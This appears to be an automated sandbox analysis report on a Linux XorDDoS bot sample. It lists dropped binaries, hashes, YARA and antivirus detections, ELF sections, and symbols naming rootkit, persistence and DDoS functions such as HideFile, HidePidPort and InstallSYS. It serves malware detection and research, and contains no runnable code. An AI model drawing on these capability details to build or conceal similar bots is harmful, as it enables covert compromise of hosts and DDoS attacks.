File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625889
Entropy (8bit):	6.244435671890783
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1Av:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91g
MD5:	799BAE277CBB415227A0100B46398B8F
SHA1:	BA160FF928BF1E4F6D0AB0922C0D5AE297CBD452
SHA-256:	0F7199407D09B4D2A7AACD583CE8AA2CB597F5DE3F82803D90D13D9F279F4F63
SHA-512:	35A5EBE50C0F2879D1C23B9025D1B6A06611E343F683703C9F36CA3A888A3E759CBD3AE2F5CC436D398B950DC382FB60643C84C94BE59E7720AE6F6740D3212F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/yfiimchuiz, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/yfiimchuiz, Author: ditekSHen Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/yfiimchuiz, Author: Akamai CSIRT
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/zetazkptwu

Process:	/tmp/dkuidbsedp
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	598016
Entropy (8bit):	6.171512493331485
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEPP:FBXmkN/+Fhu/Qo4h9L+zNN4BVEX
MD5:	ECA7B8ED853FEA8C58FDBBD03E381262
SHA1:	254CE306A2FE891D8E18AF0D7265E18932F077D8
SHA-256:	65915045AAE230096F97A5CCBF47A9BC16E8854FFB29150B89BE8E7C7AA5F448
SHA-512:	285E50EFB4D3F9F40F02CDD2D20EB322027013C3DFE11C21361DA0FBEF232CAB35F9DB179E36AF470210A387849F3E1DB65FF268BCFCD37BEEE7412334C03CB3
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/zetazkptwu, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/zetazkptwu, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

/usr/bin/zyapsjpaje

Process:	/tmp/dkuidbsedp
File Type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Category:	dropped
Size (bytes):	625889
Entropy (8bit):	6.244437239066855
Encrypted:	false
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1Ak:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91/
MD5:	E6A731EAB67241EEF92D9748FD128432
SHA1:	A8854E19542C2FFB9675CB6CFAB335E4F7DDF0D0
SHA-256:	2F9369C8768F1F3AE2F25DFFB78D1C238075E981B3760B0DC0A1B43117FF9ABC
SHA-512:	1EE31A214D177A2C8E3E84162881C99E7AE5BA15BB87F6BF4C8DAF3334C01F6FF880C56419069084643C5ABCA2BF0DD84938F1A60A00D578ABE7AF7E65FA2341
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XorDDoS, Description: Yara detected XorDDoS Bot, Source: /usr/bin/zyapsjpaje, Author: Joe Security Rule: MALWARE_Linux_XORDDoS, Description: Detects XORDDoS, Source: /usr/bin/zyapsjpaje, Author: ditekSHen Rule: XOR_DDosv1, Description: Rule to detect XOR DDos infection, Source: /usr/bin/zyapsjpaje, Author: Akamai CSIRT
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r........................ ... ................a..............@...........Q.td........................................GNU.................U.....5..................1.^....PTRh Q..h`Q..QVh............U..S........[..,p..........t..~..X[.......U..S....=.....uT.0...-(.......X......9.v...&...............(........9.w......t...$.~................[]......U..............Z..o....t .T$..D$......D$.......$.~.......4.....t........t...$4.......U.....E..D$..E..D$..E...$.....E..D$..E...$...........U...(.E.....D$..E..D$...$.+...]....E..}..x..E....;E....E......?.E..E.....E..E..".E..E....</u..U.....E..........m...}..y.E..E.E...U...(.E.....D$..E..D$...$.+........E..}..x..E....;E....E........E..E.....E..E.E...U...(...............D$..D$.......$.P....E..D$..D$..+...D$.............$......E.....D$..E..D$.........$.<....E..}..x..E....;E...............E..E.....E...............U..W.....

Static File Info

General

File type:	ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped
Entropy (8bit):	6.244401838455305
TrID:	ELF Executable and Linkable format (Linux) (4029/14) 50.16% ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:	dkuidbsedp
File size:	625878
MD5:	37542894283b8851469753de69c0bcdc
SHA1:	0480f29f346b400b989d88798b4418d5ef0fd3d9
SHA256:	7c0d5161ad70acf5b98b640089d23ada44935dcd7240c64d43f7cc54d853acb1
SHA512:	0ce2fcc97494eab5feec72ab21163e1ac0c6ae9182f6d366dd7e5a2bcb00c1c46276eb4504fa09b79d258113881a2ebb5fe942642f88f738b68de83d9dffe71f
SSDEEP:	12288:FBXOvdwV1/n/dQFhWlH/c1dHo4h9L+zNZrr4T6yF8EEP4UlUuTh1Am:FBXmkN/+Fhu/Qo4h9L+zNN4BVEBl/91b
TLSH:	EAD47D06F243EAF7C4970570124BF7BF4230E6318412DF8AB6889D5AB9379F52A4E356
File Content Preview:	.ELF........................4....r......4. ...(......................a...a...............a...............r.......................... ... ................a..............@...........Q.td........................................GNU.................U......5...

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Intel 80386
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x8048110
Flags:	0x0
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	5
Section Header Offset:	553480
Section Header Size:	40
Number of Section Headers:	28
Header String Table Index:	25

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Link	Info	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0	0	0
.note.ABI-tag	NOTE	0x80480d4	0xd4	0x20	0x0	0x2	A	0	0	4
.init	PROGBITS	0x80480f4	0xf4	0x17	0x0	0x6	AX	0	0	4
.text	PROGBITS	0x8048110	0x110	0x697d8	0x0	0x6	AX	0	0	16
__libc_freeres_fn	PROGBITS	0x80b18f0	0x698f0	0x100f	0x0	0x6	AX	0	0	16
__libc_thread_freeres_fn	PROGBITS	0x80b2900	0x6a900	0x1db	0x0	0x6	AX	0	0	16
.fini	PROGBITS	0x80b2adc	0x6aadc	0x1c	0x0	0x6	AX	0	0	4
.rodata	PROGBITS	0x80b2b00	0x6ab00	0x153c0	0x0	0x2	A	0	0	32
__libc_subfreeres	PROGBITS	0x80c7ec0	0x7fec0	0x30	0x0	0x2	A	0	0	4
__libc_atexit	PROGBITS	0x80c7ef0	0x7fef0	0x4	0x0	0x2	A	0	0	4
__libc_thread_subfreeres	PROGBITS	0x80c7ef4	0x7fef4	0x8	0x0	0x2	A	0	0	4
.eh_frame	PROGBITS	0x80c7efc	0x7fefc	0x60f4	0x0	0x2	A	0	0	4
.gcc_except_table	PROGBITS	0x80cdff0	0x85ff0	0x11b	0x0	0x2	A	0	0	1
.tdata	PROGBITS	0x80cf10c	0x8610c	0x14	0x0	0x403	WAT	0	0	4
.tbss	NOBITS	0x80cf120	0x86120	0x2c	0x0	0x403	WAT	0	0	4
.ctors	PROGBITS	0x80cf120	0x86120	0x8	0x0	0x3	WA	0	0	4
.dtors	PROGBITS	0x80cf128	0x86128	0xc	0x0	0x3	WA	0	0	4
.jcr	PROGBITS	0x80cf134	0x86134	0x4	0x0	0x3	WA	0	0	4
.data.rel.ro	PROGBITS	0x80cf138	0x86138	0x2c	0x0	0x3	WA	0	0	4
.got	PROGBITS	0x80cf164	0x86164	0x8	0x4	0x3	WA	0	0	4
.got.plt	PROGBITS	0x80cf16c	0x8616c	0xc	0x4	0x3	WA	0	0	4
.data	PROGBITS	0x80cf180	0x86180	0xb40	0x0	0x3	WA	0	0	32
.bss	NOBITS	0x80cfcc0	0x86cc0	0x6718	0x0	0x3	WA	0	0	32
__libc_freeres_ptrs	NOBITS	0x80d63d8	0x86cc0	0x14	0x0	0x3	WA	0	0	4
.comment	PROGBITS	0x0	0x86cc0	0x422	0x0	0x0		0	0	1
.shstrtab	STRTAB	0x0	0x870e2	0x126	0x0	0x0		0	0	1
.symtab	SYMTAB	0x0	0x87668	0x93c0	0x10	0x0		27	914	4
.strtab	STRTAB	0x0	0x90a28	0x82a3	0x0	0x0		0	0	1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Prog Interpreter	Section Mappings
LOAD	0x0	0x8048000	0x8048000	0x8610b	0x8610b	6.1966	0x5	R E	0x1000		.note.ABI-tag .init .text __libc_freeres_fn __libc_thread_freeres_fn .fini .rodata __libc_subfreeres __libc_atexit __libc_thread_subfreeres .eh_frame .gcc_except_table
LOAD	0x8610c	0x80cf10c	0x80cf10c	0xbb4	0x72e0	3.6572	0x6	RW	0x1000		.tdata .tbss .ctors .dtors .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs
NOTE	0xd4	0x80480d4	0x80480d4	0x20	0x20	1.7487	0x4	R	0x4		.note.ABI-tag
TLS	0x8610c	0x80cf10c	0x80cf10c	0x14	0x40	2.8414	0x4	R	0x4		.tdata .tbss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Symbols

Name	Version Info Name	Version Info File Name	Section Name	Value	Size	Symbol Type	Symbol Bind	Symbol Visibility	Ndx
			.symtab	0x0	0	NOTYPE	<unknown>	DEFAULT	SHN_UNDEF
			.symtab	0x80480d4	0	SECTION	<unknown>	DEFAULT	1
			.symtab	0x80480f4	0	SECTION	<unknown>	DEFAULT	2
			.symtab	0x8048110	0	SECTION	<unknown>	DEFAULT	3
			.symtab	0x80b18f0	0	SECTION	<unknown>	DEFAULT	4
			.symtab	0x80b2900	0	SECTION	<unknown>	DEFAULT	5
			.symtab	0x80b2adc	0	SECTION	<unknown>	DEFAULT	6
			.symtab	0x80b2b00	0	SECTION	<unknown>	DEFAULT	7
			.symtab	0x80c7ec0	0	SECTION	<unknown>	DEFAULT	8
			.symtab	0x80c7ef0	0	SECTION	<unknown>	DEFAULT	9
			.symtab	0x80c7ef4	0	SECTION	<unknown>	DEFAULT	10
			.symtab	0x80c7efc	0	SECTION	<unknown>	DEFAULT	11
			.symtab	0x80cdff0	0	SECTION	<unknown>	DEFAULT	12
			.symtab	0x80cf10c	0	SECTION	<unknown>	DEFAULT	13
			.symtab	0x80cf120	0	SECTION	<unknown>	DEFAULT	14
			.symtab	0x80cf120	0	SECTION	<unknown>	DEFAULT	15
			.symtab	0x80cf128	0	SECTION	<unknown>	DEFAULT	16
			.symtab	0x80cf134	0	SECTION	<unknown>	DEFAULT	17
			.symtab	0x80cf138	0	SECTION	<unknown>	DEFAULT	18
			.symtab	0x80cf164	0	SECTION	<unknown>	DEFAULT	19
			.symtab	0x80cf16c	0	SECTION	<unknown>	DEFAULT	20
			.symtab	0x80cf180	0	SECTION	<unknown>	DEFAULT	21
			.symtab	0x80cfcc0	0	SECTION	<unknown>	DEFAULT	22
			.symtab	0x80d63d8	0	SECTION	<unknown>	DEFAULT	23
			.symtab	0x0	0	SECTION	<unknown>	DEFAULT	24
.L108			.symtab	0x80ad950	0	NOTYPE	<unknown>	DEFAULT	3
.L113			.symtab	0x80ad990	0	NOTYPE	<unknown>	DEFAULT	3
.L114			.symtab	0x80ad9f8	0	NOTYPE	<unknown>	DEFAULT	3
.L115			.symtab	0x80ada30	0	NOTYPE	<unknown>	DEFAULT	3
.L116			.symtab	0x80ada4e	0	NOTYPE	<unknown>	DEFAULT	3
.L117			.symtab	0x80ada6c	0	NOTYPE	<unknown>	DEFAULT	3
.L118			.symtab	0x80ada89	0	NOTYPE	<unknown>	DEFAULT	3
.L119			.symtab	0x80adabd	0	NOTYPE	<unknown>	DEFAULT	3
.L12			.symtab	0x80b130b	0	NOTYPE	<unknown>	DEFAULT	3
.L120			.symtab	0x80adadc	0	NOTYPE	<unknown>	DEFAULT	3
.L121			.symtab	0x80adafb	0	NOTYPE	<unknown>	DEFAULT	3
.L122			.symtab	0x80ad8e3	0	NOTYPE	<unknown>	DEFAULT	3
.L123			.symtab	0x80adb2b	0	NOTYPE	<unknown>	DEFAULT	3
.L124			.symtab	0x80add7f	0	NOTYPE	<unknown>	DEFAULT	3
.L125			.symtab	0x80addb4	0	NOTYPE	<unknown>	DEFAULT	3
.L126			.symtab	0x80add02	0	NOTYPE	<unknown>	DEFAULT	3
.L127			.symtab	0x80add1f	0	NOTYPE	<unknown>	DEFAULT	3
.L128			.symtab	0x80add46	0	NOTYPE	<unknown>	DEFAULT	3
.L129			.symtab	0x80add63	0	NOTYPE	<unknown>	DEFAULT	3
.L130			.symtab	0x80adb8c	0	NOTYPE	<unknown>	DEFAULT	3
.L131			.symtab	0x80adbd3	0	NOTYPE	<unknown>	DEFAULT	3
.L132			.symtab	0x80adc00	0	NOTYPE	<unknown>	DEFAULT	3
.L133			.symtab	0x80adc37	0	NOTYPE	<unknown>	DEFAULT	3
.L134			.symtab	0x80adc50	0	NOTYPE	<unknown>	DEFAULT	3
.L135			.symtab	0x80adc7d	0	NOTYPE	<unknown>	DEFAULT	3
.L136			.symtab	0x80adcb5	0	NOTYPE	<unknown>	DEFAULT	3
.L137			.symtab	0x80adcc9	0	NOTYPE	<unknown>	DEFAULT	3
.L14			.symtab	0x80b1419	0	NOTYPE	<unknown>	DEFAULT	3
.L15			.symtab	0x80b1408	0	NOTYPE	<unknown>	DEFAULT	3
.L16			.symtab	0x80b13f8	0	NOTYPE	<unknown>	DEFAULT	3
.L17			.symtab	0x80b13e8	0	NOTYPE	<unknown>	DEFAULT	3
.L18			.symtab	0x80b138c	0	NOTYPE	<unknown>	DEFAULT	3
.L19			.symtab	0x80b137e	0	NOTYPE	<unknown>	DEFAULT	3
.L20			.symtab	0x80b1345	0	NOTYPE	<unknown>	DEFAULT	3
.L21			.symtab	0x80b1371	0	NOTYPE	<unknown>	DEFAULT	3
.L258			.symtab	0x80ae76c	0	NOTYPE	<unknown>	DEFAULT	3
.L259			.symtab	0x80ae4a0	0	NOTYPE	<unknown>	DEFAULT	3
.L260			.symtab	0x80ae5f7	0	NOTYPE	<unknown>	DEFAULT	3
.L261			.symtab	0x80ae7c0	0	NOTYPE	<unknown>	DEFAULT	3
.L262			.symtab	0x80ae5e9	0	NOTYPE	<unknown>	DEFAULT	3
.L264			.symtab	0x80ae43d	0	NOTYPE	<unknown>	DEFAULT	3
.L266			.symtab	0x80ae496	0	NOTYPE	<unknown>	DEFAULT	3
.L267			.symtab	0x80ae68f	0	NOTYPE	<unknown>	DEFAULT	3
.L268			.symtab	0x80ae6a0	0	NOTYPE	<unknown>	DEFAULT	3
.L269			.symtab	0x80ae605	0	NOTYPE	<unknown>	DEFAULT	3
.L270			.symtab	0x80ae628	0	NOTYPE	<unknown>	DEFAULT	3
.L271			.symtab	0x80ae642	0	NOTYPE	<unknown>	DEFAULT	3
.L272			.symtab	0x80ae664	0	NOTYPE	<unknown>	DEFAULT	3
.L273			.symtab	0x80ae4ab	0	NOTYPE	<unknown>	DEFAULT	3
.L274			.symtab	0x80ae4e4	0	NOTYPE	<unknown>	DEFAULT	3
.L275			.symtab	0x80ae599	0	NOTYPE	<unknown>	DEFAULT	3
.L276			.symtab	0x80ae55f	0	NOTYPE	<unknown>	DEFAULT	3
.L277			.symtab	0x80ae5da	0	NOTYPE	<unknown>	DEFAULT	3
.L278			.symtab	0x80ae835	0	NOTYPE	<unknown>	DEFAULT	3
.L279			.symtab	0x80ae7ce	0	NOTYPE	<unknown>	DEFAULT	3
.L280			.symtab	0x80ae7e0	0	NOTYPE	<unknown>	DEFAULT	3
.L281			.symtab	0x80ae6b7	0	NOTYPE	<unknown>	DEFAULT	3
.L282			.symtab	0x80ae70c	0	NOTYPE	<unknown>	DEFAULT	3
.L283			.symtab	0x80ae467	0	NOTYPE	<unknown>	DEFAULT	3
.L350			.symtab	0x80ae840	0	NOTYPE	<unknown>	DEFAULT	3
.L351			.symtab	0x80ae84a	0	NOTYPE	<unknown>	DEFAULT	3
.L352			.symtab	0x80ae859	0	NOTYPE	<unknown>	DEFAULT	3
.L353			.symtab	0x80ae863	0	NOTYPE	<unknown>	DEFAULT	3
.L354			.symtab	0x80ae872	0	NOTYPE	<unknown>	DEFAULT	3
.L355			.symtab	0x80ae87d	0	NOTYPE	<unknown>	DEFAULT	3
.L356			.symtab	0x80ae887	0	NOTYPE	<unknown>	DEFAULT	3
.L357			.symtab	0x80ae892	0	NOTYPE	<unknown>	DEFAULT	3
.L358			.symtab	0x80ae89e	0	NOTYPE	<unknown>	DEFAULT	3
.L359			.symtab	0x80ae8aa	0	NOTYPE	<unknown>	DEFAULT	3
.L360			.symtab	0x80ae8b3	0	NOTYPE	<unknown>	DEFAULT	3
.L361			.symtab	0x80ae8bd	0	NOTYPE	<unknown>	DEFAULT	3
.L362			.symtab	0x80ae8cc	0	NOTYPE	<unknown>	DEFAULT	3
.L363			.symtab	0x80ae8db	0	NOTYPE	<unknown>	DEFAULT	3
.L364			.symtab	0x80ae8ea	0	NOTYPE	<unknown>	DEFAULT	3
.L365			.symtab	0x80ae8f9	0	NOTYPE	<unknown>	DEFAULT	3
.L366			.symtab	0x80ae908	0	NOTYPE	<unknown>	DEFAULT	3
.L380			.symtab	0x80ae438	0	NOTYPE	<unknown>	DEFAULT	3
.L411			.symtab	0x80aeb10	0	NOTYPE	<unknown>	DEFAULT	3
.L412			.symtab	0x80aeae6	0	NOTYPE	<unknown>	DEFAULT	3
.L413			.symtab	0x80aeb54	0	NOTYPE	<unknown>	DEFAULT	3
.L414			.symtab	0x80aebc0	0	NOTYPE	<unknown>	DEFAULT	3
.L415			.symtab	0x80aec20	0	NOTYPE	<unknown>	DEFAULT	3
.L416			.symtab	0x80aec60	0	NOTYPE	<unknown>	DEFAULT	3
.L61			.symtab	0x80ad673	0	NOTYPE	<unknown>	DEFAULT	3
.L63			.symtab	0x80ad6ef	0	NOTYPE	<unknown>	DEFAULT	3
.L64			.symtab	0x80ad6ce	0	NOTYPE	<unknown>	DEFAULT	3
.L67			.symtab	0x80ad6de	0	NOTYPE	<unknown>	DEFAULT	3
.L68			.symtab	0x80ad6d6	0	NOTYPE	<unknown>	DEFAULT	3
.L69			.symtab	0x80ad6a2	0	NOTYPE	<unknown>	DEFAULT	3
.L70			.symtab	0x80ad6c2	0	NOTYPE	<unknown>	DEFAULT	3
.L74			.symtab	0x80afb63	0	NOTYPE	<unknown>	DEFAULT	3
.L76			.symtab	0x80afbdf	0	NOTYPE	<unknown>	DEFAULT	3
.L77			.symtab	0x80afbbe	0	NOTYPE	<unknown>	DEFAULT	3
.L80			.symtab	0x80afbce	0	NOTYPE	<unknown>	DEFAULT	3
.L81			.symtab	0x80afbc6	0	NOTYPE	<unknown>	DEFAULT	3
.L82			.symtab	0x80afb92	0	NOTYPE	<unknown>	DEFAULT	3
.L83			.symtab	0x80afbb2	0	NOTYPE	<unknown>	DEFAULT	3
AddService			.symtab	0x8048865	807	FUNC	<unknown>	DEFAULT	3
CalcCrc32			.symtab	0x80492b4	70	FUNC	<unknown>	DEFAULT	3
CalcFileCrc			.symtab	0x8049346	172	FUNC	<unknown>	DEFAULT	3
CalcFindIpCrc			.symtab	0x8049320	38	FUNC	<unknown>	DEFAULT	3
CalcHeaderCrc			.symtab	0x80492fa	38	FUNC	<unknown>	DEFAULT	3
CheckLKM			.symtab	0x804a670	107	FUNC	<unknown>	DEFAULT	3
CreateDir			.symtab	0x80483de	375	FUNC	<unknown>	DEFAULT	3
DNS_ADDR			.symtab	0x80cf4cc	16	OBJECT	<unknown>	DEFAULT	21
DNS_ADDR2			.symtab	0x80cf4dc	16	OBJECT	<unknown>	DEFAULT	21
DNS_PORT			.symtab	0x80cf4ec	4	OBJECT	<unknown>	DEFAULT	21
DelService			.symtab	0x8048cdc	275	FUNC	<unknown>	DEFAULT	3
DelService_form_pid			.symtab	0x8048def	113	FUNC	<unknown>	DEFAULT	3
GetCpuInfo			.symtab	0x804e2ce	539	FUNC	<unknown>	DEFAULT	3
GetIndex			.symtab	0x804b418	189	FUNC	<unknown>	DEFAULT	3
GetLanSpeed			.symtab	0x804e5e1	243	FUNC	<unknown>	DEFAULT	3
GetMemStat			.symtab	0x804e1d9	245	FUNC	<unknown>	DEFAULT	3
Get_AllIP			.symtab	0x804ef5d	375	FUNC	<unknown>	DEFAULT	3
HideFile			.symtab	0x804a74d	151	FUNC	<unknown>	DEFAULT	3
HidePidPort			.symtab	0x804a6db	114	FUNC	<unknown>	DEFAULT	3
InstallSYS			.symtab	0x8048b8c	336	FUNC	<unknown>	DEFAULT	3
LinuxExec			.symtab	0x8048eed	122	FUNC	<unknown>	DEFAULT	3
LinuxExec_Argv			.symtab	0x8048f67	135	FUNC	<unknown>	DEFAULT	3
LinuxExec_Argv2			.symtab	0x8048fee	148	FUNC	<unknown>	DEFAULT	3
LogFacility			.symtab	0x80cfa0c	4	OBJECT	<unknown>	DEFAULT	21
LogFile			.symtab	0x80cfa08	4	OBJECT	<unknown>	DEFAULT	21
LogMask			.symtab	0x80cfa00	4	OBJECT	<unknown>	DEFAULT	21
LogStat			.symtab	0x80d5044	4	OBJECT	<unknown>	DEFAULT	22
LogTag			.symtab	0x80d5048	4	OBJECT	<unknown>	DEFAULT	22
LogType			.symtab	0x80cfa04	4	OBJECT	<unknown>	DEFAULT	21
MAGIC_STR			.symtab	0x80d1f60	33	OBJECT	<unknown>	DEFAULT	22
MainList			.symtab	0x80d1fa0	264	OBJECT	<unknown>	DEFAULT	22
ReadWord			.symtab	0x804e150	137	FUNC	<unknown>	DEFAULT	3
SIZE_DNS_H			.symtab	0x80cf4a4	4	OBJECT	<unknown>	DEFAULT	21
SIZE_DNS_T			.symtab	0x80cf4a8	4	OBJECT	<unknown>	DEFAULT	21
SIZE_IP_H			.symtab	0x80cf498	4	OBJECT	<unknown>	DEFAULT	21
SIZE_PSEUDO_HDR			.symtab	0x80cf4ac	4	OBJECT	<unknown>	DEFAULT	21
SIZE_TCP_H			.symtab	0x80cf4a0	4	OBJECT	<unknown>	DEFAULT	21
SIZE_UDP_H			.symtab	0x80cf49c	4	OBJECT	<unknown>	DEFAULT	21
SYS_BUF			.symtab	0x80cfce0	1	OBJECT	<unknown>	DEFAULT	22
SyslogAddr			.symtab	0x80d5060	110	OBJECT	<unknown>	DEFAULT	22
THREAD_NUM			.symtab	0x80d6170	4	OBJECT	<unknown>	DEFAULT	22
_Exit			.symtab	0x8067a28	19	FUNC	<unknown>	DEFAULT	3
_GLOBAL_OFFSET_TABLE_			.symtab	0x80cf16c	0	OBJECT	<unknown>	HIDDEN	20
_IO_2_1_stderr_			.symtab	0x80cf700	152	OBJECT	<unknown>	DEFAULT	21
_IO_2_1_stdin_			.symtab	0x80cf5c0	152	OBJECT	<unknown>	DEFAULT	21
_IO_2_1_stdout_			.symtab	0x80cf660	152	OBJECT	<unknown>	DEFAULT	21
_IO_adjust_column			.symtab	0x805c9b0	60	FUNC	<unknown>	DEFAULT	3
_IO_adjust_wcolumn			.symtab	0x8084770	63	FUNC	<unknown>	DEFAULT	3
_IO_cleanup			.symtab	0x805d310	409	FUNC	<unknown>	DEFAULT	3
_IO_default_doallocate			.symtab	0x805de10	143	FUNC	<unknown>	DEFAULT	3
_IO_default_finish			.symtab	0x805e310	525	FUNC	<unknown>	DEFAULT	3
_IO_default_imbue			.symtab	0x805cac0	5	FUNC	<unknown>	DEFAULT	3
_IO_default_pbackfail			.symtab	0x805d900	310	FUNC	<unknown>	DEFAULT	3
_IO_default_read			.symtab	0x805ca90	10	FUNC	<unknown>	DEFAULT	3
_IO_default_seek			.symtab	0x805ca70	15	FUNC	<unknown>	DEFAULT	3
_IO_default_seekoff			.symtab	0x805c900	15	FUNC	<unknown>	DEFAULT	3
_IO_default_seekpos			.symtab	0x805c810	59	FUNC	<unknown>	DEFAULT	3
_IO_default_setbuf			.symtab	0x805dd10	244	FUNC	<unknown>	DEFAULT	3
_IO_default_showmanyc			.symtab	0x805cab0	10	FUNC	<unknown>	DEFAULT	3
_IO_default_stat			.symtab	0x805ca80	10	FUNC	<unknown>	DEFAULT	3
_IO_default_sync			.symtab	0x805c8f0	7	FUNC	<unknown>	DEFAULT	3
_IO_default_uflow			.symtab	0x805c7b0	52	FUNC	<unknown>	DEFAULT	3
_IO_default_underflow			.symtab	0x805c7a0	10	FUNC	<unknown>	DEFAULT	3
_IO_default_write			.symtab	0x805caa0	7	FUNC	<unknown>	DEFAULT	3
_IO_default_xsgetn			.symtab	0x805e250	185	FUNC	<unknown>	DEFAULT	3
_IO_default_xsputn			.symtab	0x805cc80	225	FUNC	<unknown>	DEFAULT	3
_IO_do_write			.symtab	0x805bd80	271	FUNC	<unknown>	DEFAULT	3
_IO_doallocbuf			.symtab	0x805dc80	133	FUNC	<unknown>	DEFAULT	3
_IO_fclose			.symtab	0x8057df0	439	FUNC	<unknown>	DEFAULT	3
_IO_feof			.symtab	0x80596d0	154	FUNC	<unknown>	DEFAULT	3
_IO_fgets			.symtab	0x8057ff0	360	FUNC	<unknown>	DEFAULT	3
_IO_file_attach			.symtab	0x8059dc0	133	FUNC	<unknown>	DEFAULT	3
_IO_file_close			.symtab	0x805a940	18	FUNC	<unknown>	DEFAULT	3
_IO_file_close_it			.symtab	0x805b2f0	581	FUNC	<unknown>	DEFAULT	3
_IO_file_close_mmap			.symtab	0x805a960	60	FUNC	<unknown>	DEFAULT	3
_IO_file_doallocate			.symtab	0x80839b0	275	FUNC	<unknown>	DEFAULT	3
_IO_file_finish			.symtab	0x805c4a0	327	FUNC	<unknown>	DEFAULT	3
_IO_file_fopen			.symtab	0x805b540	1388	FUNC	<unknown>	DEFAULT	3
_IO_file_init			.symtab	0x805b040	51	FUNC	<unknown>	DEFAULT	3
_IO_file_jumps			.symtab	0x80b3e00	84	OBJECT	<unknown>	DEFAULT	7
_IO_file_jumps_maybe_mmap			.symtab	0x80b3ec0	84	OBJECT	<unknown>	DEFAULT	7
_IO_file_jumps_mmap			.symtab	0x80b3e60	84	OBJECT	<unknown>	DEFAULT	7
_IO_file_open			.symtab	0x805af30	263	FUNC	<unknown>	DEFAULT	3
_IO_file_overflow			.symtab	0x805c030	1131	FUNC	<unknown>	DEFAULT	3
_IO_file_read			.symtab	0x805a9d0	48	FUNC	<unknown>	DEFAULT	3
_IO_file_seek			.symtab	0x8059fd0	18	FUNC	<unknown>	DEFAULT	3
_IO_file_seekoff			.symtab	0x805aa00	1245	FUNC	<unknown>	DEFAULT	3
_IO_file_seekoff_maybe_mmap			.symtab	0x8059f80	80	FUNC	<unknown>	DEFAULT	3
_IO_file_seekoff_mmap			.symtab	0x8059e50	297	FUNC	<unknown>	DEFAULT	3
_IO_file_setbuf			.symtab	0x805aee0	75	FUNC	<unknown>	DEFAULT	3
_IO_file_setbuf_mmap			.symtab	0x805b270	115	FUNC	<unknown>	DEFAULT	3
_IO_file_stat			.symtab	0x805a9a0	37	FUNC	<unknown>	DEFAULT	3
_IO_file_sync			.symtab	0x805be90	406	FUNC	<unknown>	DEFAULT	3
_IO_file_sync_mmap			.symtab	0x8059ff0	165	FUNC	<unknown>	DEFAULT	3
_IO_file_underflow			.symtab	0x805b080	495	FUNC	<unknown>	DEFAULT	3
_IO_file_underflow_maybe_mmap			.symtab	0x805a2e0	30	FUNC	<unknown>	DEFAULT	3
